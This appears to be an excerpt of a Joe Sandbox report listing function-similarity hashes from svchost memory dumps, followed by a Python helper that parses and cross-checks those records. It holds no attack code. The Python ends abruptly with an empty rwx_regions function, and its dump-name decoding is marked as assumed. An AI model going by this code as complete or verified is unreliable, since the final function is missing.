                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27510561B0E68A0FE397AB3CD8555B57BE1DF87221B0941FBD48CC72A3EC58AC468351
                                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6f4c1cdcc80f8e72d3173afc8bd43940aff781365ec7087b8eff508f3f8f1d7e
• Instruction ID: e2c381b543a7b8402e952b13fefa60124f5b364307d98fb30789a906b81c9bdc
• Opcode Fuzzy Hash: 6f4c1cdcc80f8e72d3173afc8bd43940aff781365ec7087b8eff508f3f8f1d7e
• Instruction Fuzzy Hash: F531E061B1D9490FE789FA3CC85A679B6C2EF99311F0401BEE44EC32A3DE689C428344
Memory Dump Source
• Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
• Instruction ID: b146b2384389625c43987c70c9937261856e3920392955cbe504822992d05d04
• Opcode Fuzzy Hash: f31924417bb43cbcf7248e2be088c48b15cc4627aecf326de3d5f7e32b0f9e67
• Instruction Fuzzy Hash: BF3109A1B1D9094FE745BFBCC80A7BC77E1EF99302F0442BAE50CC3292DD2858028352
Memory Dump Source
• Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21ebbe6f680788b8339002e48ef3add7a660bd422cbe7227cd7c86313c147895
• Instruction ID: f7c7fe562a1443243a25240ae2f43a8a24bc63da59f7269ebcd1e727bdceb140
• Opcode Fuzzy Hash: 21ebbe6f680788b8339002e48ef3add7a660bd422cbe7227cd7c86313c147895
• Instruction Fuzzy Hash: 0E318C70A19A4E8FEB45EFB8C4556A9B7E1FF88300F5045B8D009C7286DE29A802C751
Memory Dump Source
• Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 696208df57174e52247848d592128252b2a10be1ab4958dfdcaadc675f062c37
• Instruction ID: a9b092613c211e965a0bd47473dac050955df21c7f61ed42771df63259380844
• Opcode Fuzzy Hash: 696208df57174e52247848d592128252b2a10be1ab4958dfdcaadc675f062c37
• Instruction Fuzzy Hash: 98218764A1A64DCFE782FF78C4A56E9BBF1AF85214F8084E9E409C739BDD2C6801C751
Memory Dump Source
• Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 346b099853e0ec330834e6924e937add2383bcad90d414f02c709f7cde66c90c
• Instruction ID: 08294af617a53da4ffc551f02e3c108d8034576b78a5ccf5348f2ed41fa86ca2
• Opcode Fuzzy Hash: 346b099853e0ec330834e6924e937add2383bcad90d414f02c709f7cde66c90c
• Instruction Fuzzy Hash: 73014950E0D7C58FF746BF3888558727FE1DF92211B0804EFE889C62A7EC48A954C392
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 41990c0b0524863284caac00f4590a7a38371d984cdf0da14cc11f0561dad08b
• Instruction ID: b72d52e919037fa7b32a5f0559b9616600ee101bc96dcc6c07439c8040f4ac2c
• Opcode Fuzzy Hash: 41990c0b0524863284caac00f4590a7a38371d984cdf0da14cc11f0561dad08b
• Instruction Fuzzy Hash: 3D51139061E6C54FD787AB7898642B57FD9DF8721AB1800FEE0C9C72E3DE184806C346
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34476ff4007f0a91e44b87b3da27ea9c0b5f4924cc86faad2cca23005c87ff27
• Instruction ID: 801f0c08e22364cbe9ee0e9425222629f8e3b751dcdfa247cf861f70ed3af5e6
• Opcode Fuzzy Hash: 34476ff4007f0a91e44b87b3da27ea9c0b5f4924cc86faad2cca23005c87ff27
• Instruction Fuzzy Hash: 1031C9A290CB9A4FE741EF78D8A11E97FB4FF95211B4440BBC189C72E3ED185846C390
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e7f152ef8dd6287aa40081cee4c106885268d18d15ca8c009f3fc1355042e77
• Instruction ID: b75a6c0ad02b18f38ffe20f8106abc0aedd13b7e1421539576a07f8f04629082
• Opcode Fuzzy Hash: 9e7f152ef8dd6287aa40081cee4c106885268d18d15ca8c009f3fc1355042e77
• Instruction Fuzzy Hash: CD2192A291CB8A4FE745AF78C8A51F9BFB5FF55201F4540AAD14AD32E3ED286805C390
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 97a1b3458728b04d846b87cf78cfaa9a5aa51d8eef428cb9d79250b8a11a434a
• Instruction ID: 7e562b8f563fd4435c9bce176958b5df41ba7a48b99bd7554b8cd80f3c97d9e5
• Opcode Fuzzy Hash: 97a1b3458728b04d846b87cf78cfaa9a5aa51d8eef428cb9d79250b8a11a434a
• Instruction Fuzzy Hash: 3971B6A0A6CA494FD799BB78D4696BD7A95FF98341F4044B8E50EC33D6ED28A801C740
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e2ccfd54f04a743d77fd962a319c0abf567867f8fbc242112f17a662cb5a6cd
• Instruction ID: e614070fdf9f18efd4f92c952b8f3968e6845b1e154a19dbc1353395fb1bed38
• Opcode Fuzzy Hash: 4e2ccfd54f04a743d77fd962a319c0abf567867f8fbc242112f17a662cb5a6cd
• Instruction Fuzzy Hash: A9510661A0E6860FE397A738D8652B57BE5DF8621170940FBD48CC72A3ED1CAC468362
Memory Dump Source
• Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
Similarity
• API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 53b27c9b5883d938be9adc5d2a96d6067645de320c10d512a0f00f5beedc2f04
                                                                                                                                                                                                                                              • Instruction ID: fc76fc91719700f074b6df4dac3294d3044675bcabc7612cc0bb09728553b21e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53b27c9b5883d938be9adc5d2a96d6067645de320c10d512a0f00f5beedc2f04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A31B161B1D9490FE789FA7CD85A379B6C6EF99211F0405BEE44EC32E3DE289C428345
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4dfa5e2b06f078d85e1592b0b406ab4926421dcd4ec2abde25b6a32e672c174f
                                                                                                                                                                                                                                              • Instruction ID: 51639e0dfeaab6f337daf567d189e3deff5a07999a0f8d6388c7f2908d3e379d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dfa5e2b06f078d85e1592b0b406ab4926421dcd4ec2abde25b6a32e672c174f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C3129A1B1C9054FE745BBBCD81A3BD77E5EF99312F0442BAE40CC32D2DD2858028362
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 54e4fb72505577f781d826a5f541949523f65027a4d8d724c74acba9a789af48
                                                                                                                                                                                                                                              • Instruction ID: d6dabd69bcdad7e151027b3baf53d35522b3d42e6bd72217b8942f8ee41fb39e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54e4fb72505577f781d826a5f541949523f65027a4d8d724c74acba9a789af48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60319DB0A19A0E8FEB45EF78D4656FDBBA1FF98300F5045B8D109C7286DE28A842C750
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8219d5f8ccb214a5baa870e428d9b4542131d51de7d1c54d5791b7693914008c
                                                                                                                                                                                                                                              • Instruction ID: 0078caa5f082bff9b1d1bb05ec757438d82671fd2811f37b306c5d1470c50952
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8219d5f8ccb214a5baa870e428d9b4542131d51de7d1c54d5791b7693914008c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921D4A1A4964DCFD741EF38D0955F9BF75BF95210B8049E5D90DC338BDD286801C751
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.2265507263.00007FFB4B0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffb4b0d0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d1d122283951cd3c387bebd3cd26754317bcad0d332a800823bd1a4e05767122
                                                                                                                                                                                                                                              • Instruction ID: 167fde886e64177d4c6431f967dc083190ed62d82a8ef8c20b0619ad317213b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1d122283951cd3c387bebd3cd26754317bcad0d332a800823bd1a4e05767122
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7012690D0D7C54FE742AB389851472BFE1DF92211B0844EFE889C61E7ED18A9558392
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 448dbc8ca9aaccc7e089367688abb32a8474bc0f0c08affce00f01800daec425
                                                                                                                                                                                                                                              • Instruction ID: 0d88895aef6d4fa52dc52c0dd237d4b8d8963da305022be19e31a267e29af354
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 448dbc8ca9aaccc7e089367688abb32a8474bc0f0c08affce00f01800daec425
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1512190A1E6CA5FD787AB7888642B57FD5DF8721AB1800FBE0C9C72E3DD185806C342
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: eacbe5f02be8b884dcf7b87044adeee3241796db22425eb434a187b6f9d8be56
                                                                                                                                                                                                                                              • Instruction ID: eb50f70d26647ef03bf6e995a2ad71f1c6b13d305500044110c315747d928e9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eacbe5f02be8b884dcf7b87044adeee3241796db22425eb434a187b6f9d8be56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB31EAA290CB9A1FD746AFBCC8A51E97FB0FF55211B4844BAC189D72A3DC186806C390
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e6ccb08ff60503b10a83e2be75bab26407fc7e6e8024ef0a126e2a44ca528a8
                                                                                                                                                                                                                                              • Instruction ID: f6fee78082ec710e3ea94133e64f8da7707f806c4e80138bae593104777a0e8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e6ccb08ff60503b10a83e2be75bab26407fc7e6e8024ef0a126e2a44ca528a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4321B7A280CB8E5FE746AFB8C8651E97FB1FF55201F4845BAD08AD32E3DD286805C340
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
• String ID:
• API String ID:
• Opcode ID: 74dcd70cf5ed4a1337992ea67dbc98f446aef0d1e73497ba799259c79ad415e0
• Instruction ID: def572ecb60baab2546a614bdc8aa75b1e122ea31460ef8d4c50dc933489f8f7
• Opcode Fuzzy Hash: 74dcd70cf5ed4a1337992ea67dbc98f446aef0d1e73497ba799259c79ad415e0
• Instruction Fuzzy Hash: 9871B2A1A18A895FE798BB38D4596BD77D1FF89301B404478E54EC37D2ED2CE802C750
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
• Instruction ID: 7e60fb097a4975a02a2652cc2ecb6dce623340afac659744decf2be22ffe98b5
• Opcode Fuzzy Hash: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
• Instruction Fuzzy Hash: 28510761A0E7860FE397A73CD8561B57BE1DF8621170940FBD48CC76A3ED189C478351
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf4025e539d39f598c6c7e490587141e30db6c90c73d29a1478b8cc311ae9c31
• Instruction ID: 0cc56b30bc8717289a2b41a176ade683959d9c500b4a321a06076da3a86e3679
• Opcode Fuzzy Hash: bf4025e539d39f598c6c7e490587141e30db6c90c73d29a1478b8cc311ae9c31
• Instruction Fuzzy Hash: 5E31B161B1D9490FE789FA3CD85A279B6C2EF99215F0405BEE44EC32A3DD289C428345
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5d7ac20fda95e1deda8488267098375d9fde92322cf390992115f13e1ed7a08
• Instruction ID: f53afdeddb3419e0027bbc08a21b31206b576d4a5e3f982a9de644441e77ce22
• Opcode Fuzzy Hash: b5d7ac20fda95e1deda8488267098375d9fde92322cf390992115f13e1ed7a08
• Instruction Fuzzy Hash: 0A311AA1B1D9055FE745BBBCD80E3BD77E1EF99302F0442BAE40DC7292DD28580287A2
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 751df08acb7b1fabd867df4483aebbb8b39adb9b15643342832c6e0b0b5cf1a3
• Instruction ID: fc0a153aea171b956a1c2d6916d7fe65edf17757ca182c41ecc127453daada9e
• Opcode Fuzzy Hash: 751df08acb7b1fabd867df4483aebbb8b39adb9b15643342832c6e0b0b5cf1a3
• Instruction Fuzzy Hash: 2D31C2B0A18A4E8FEB45EFB8C4566EDB7E1FF98300F5445B8D009D7686DE38A802C750
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c40f8ebea3f93c8db5e7eeb5289f1f1324e50b5dfd256b9751e8b2f08b8372fa
• Instruction ID: 13943a0f921b69e10a6fd9a43b8f2efffbc5b2590ec44cf58d88f308ee648b3f
• Opcode Fuzzy Hash: c40f8ebea3f93c8db5e7eeb5289f1f1324e50b5dfd256b9751e8b2f08b8372fa
• Instruction Fuzzy Hash: 9921B5A154998E8FD341EB6CC0955EABFA1AF96310BA844E5D44CC378BDD28D803C751
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81b26c823045f08dbc1d198e6e74281772fd4204c7dcee07dc01ef92fa52509a
• Instruction ID: 73836c14a7bd49d0e0485ffce1cc95d28214a8cb6328f98e7ed7d7d5ed0b2763
• Opcode Fuzzy Hash: 81b26c823045f08dbc1d198e6e74281772fd4204c7dcee07dc01ef92fa52509a
• Instruction Fuzzy Hash: 42012691D0DBC55FE786AB389851472BFE0DF92311B0804ABF8C9C62A7EC18A9558392
Memory Dump Source
• Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
• Instruction ID: 3a16d559290b8b7e7fb2f3b188438f8aa1848004a62f9540b19fdd63e62ed293
• Opcode Fuzzy Hash: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
• Instruction Fuzzy Hash: 4731F4A2E1DA8E4FE741BFB8C8A14E97FB0FF81211F4441B6C189D72A3DD582806C380
Memory Dump Source
• Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 898b5185f26855775e94e315a44fe35a81385370a04d259b4b6982196d6c17d2
• Instruction ID: 9b6bc9d53e3fcd1491843ac2756bdeeca530dea9ddd1676441078fb4e03ed243
• Opcode Fuzzy Hash: 898b5185f26855775e94e315a44fe35a81385370a04d259b4b6982196d6c17d2
• Instruction Fuzzy Hash: AF21A3A1A1DA8E4FE746AFB8C8A15EA7FB1FF55201F8440A5D589D72E3DD682801C380
Memory Dump Source
• Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d24dcd9975d98e00993ef99e76747543601b1a0ef83b2811ee1c18c1f48a2eeb
• Instruction ID: 43e413c8ceb61c0f751d04e20179de0aabf913996f5b1197a24414114211a5b3
• Opcode Fuzzy Hash: d24dcd9975d98e00993ef99e76747543601b1a0ef83b2811ee1c18c1f48a2eeb
• Instruction Fuzzy Hash: 60719270B28A4D9FE798BB78C4596BD76D6FF88306B404478E54EC32D2DE6CA801C744
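The records above are the part of a Joe Sandbox report an analyst usually wants to pivot on: the Instruction Fuzzy Hash of each similar function, and the memory region it was lifted from. The Python below is an added example, not code from Joe Sandbox or from the report, that groups the bullet listing into records, decodes the dump file name, and cross-checks each record against its snapshot name. The dump-name layout it assumes (process index, dump index, dump id, base address, protection, then three fields it leaves undecoded) is inferred from the records on this page: 0000001B and 0000001D are 27 and 29 in decimal, which are the numbers in hcaresult_27_2 and hcaresult_29_2, the second field 00000002 matches the _2, and the base address matches the hex in the snapshot name. The protection decoding uses the winnt.h PAGE_* constants and assumes the fifth field is a protection value; the two records in SAMPLE are copied from the listing above.

```python
import re

# Windows page-protection constants from winnt.h. The fifth dot-separated
# field of the .sdmp name is ASSUMED to carry one of these values.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Snapshot name layout as it appears in the report: hcaresult_<proc>_<dump>_<base>_<image>.jbxd
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_(.+)\.jbxd$")

# Two records copied from the listing above (constructed sample input).
SAMPLE = """\
Memory Dump Source
• Source File: 0000001B.00000002.2354496055.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ffb4b0e0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
• Instruction ID: 7e60fb097a4975a02a2652cc2ecb6dce623340afac659744decf2be22ffe98b5
• Opcode Fuzzy Hash: 2381e47ef258c58af20e0c3c22876651fcf878db09956446a8f5b55981287246
• Instruction Fuzzy Hash: 28510761A0E7860FE397A73CD8561B57BE1DF8621170940FBD48CC76A3ED189C478351
Memory Dump Source
• Source File: 0000001D.00000002.2621166563.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_7ffb4b0f0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
• Instruction ID: 3a16d559290b8b7e7fb2f3b188438f8aa1848004a62f9540b19fdd63e62ed293
• Opcode Fuzzy Hash: 9db9c718f18619e105ad50d49ba64c5af588b27f13e005434d8989bda7b1f323
• Instruction Fuzzy Hash: 4731F4A2E1DA8E4FE741BFB8C8A14E97FB0FF81211F4441B6C189D72A3DD582806C380
"""


def parse_records(text):
    """Group the bullet listing into one dict per 'Memory Dump Source' block."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
        elif line[:1] in ("•", "-") and current is not None:
            key, _, value = line[1:].strip().partition(":")
            current[key.strip()] = value.strip()   # empty string for blank IDs
    return records


def parse_dump_name(source_field):
    """Decode 'X.sdmp, Offset: ..., based on PE: ...' into named fields (assumed layout)."""
    name, *rest = [p.strip() for p in source_field.split(",")]
    f = name.split(".")
    if len(f) != 9 or f[-1] != "sdmp":
        raise ValueError(f"unexpected dump name layout: {name}")
    extras = dict(p.split(": ", 1) for p in rest)
    prot = int(f[4], 16)
    return {
        "process_index": int(f[0], 16),          # 0x1B -> process 27
        "dump_index": int(f[1], 16),
        "dump_id": int(f[2]),
        "base": int(f[3], 16),
        "protection": prot,
        "protection_name": PAGE_PROTECTION.get(prot, f"0x{prot:x}"),
        "offset": int(extras["Offset"], 16),
        "based_on_pe": extras["based on PE"].lower() == "true",
    }


def check_record(rec):
    """Return inconsistencies between a record's dump name and snapshot name (empty = coherent)."""
    problems = []
    dump = parse_dump_name(rec["Source File"])
    m = SNAPSHOT_RE.match(rec.get("Snapshot File", ""))
    if not m:
        problems.append("snapshot name does not match hcaresult_<proc>_<dump>_<base>_<image>.jbxd")
    else:
        proc, dump_idx, base, _image = m.groups()
        if int(proc) != dump["process_index"]:
            problems.append("process index differs between dump name and snapshot name")
        if int(dump_idx) != dump["dump_index"]:
            problems.append("dump index differs between dump name and snapshot name")
        if int(base, 16) != dump["base"]:
            problems.append("base address differs between dump name and snapshot name")
    # In every record on this page Opcode ID equals Opcode Fuzzy Hash; flag any deviation.
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID and Opcode Fuzzy Hash disagree")
    return problems


def pivot_index(records):
    """Map each Instruction Fuzzy Hash to the (image, process, base) regions it was lifted from."""
    index = {}
    for rec in records:
        h = rec.get("Instruction Fuzzy Hash")
        if not h:
            continue
        dump = parse_dump_name(rec["Source File"])
        m = SNAPSHOT_RE.match(rec.get("Snapshot File", ""))
        image = m.group(4) if m else "?"
        index.setdefault(h, []).append((image, dump["process_index"], dump["base"]))
    return index


def rwx_regions(records):
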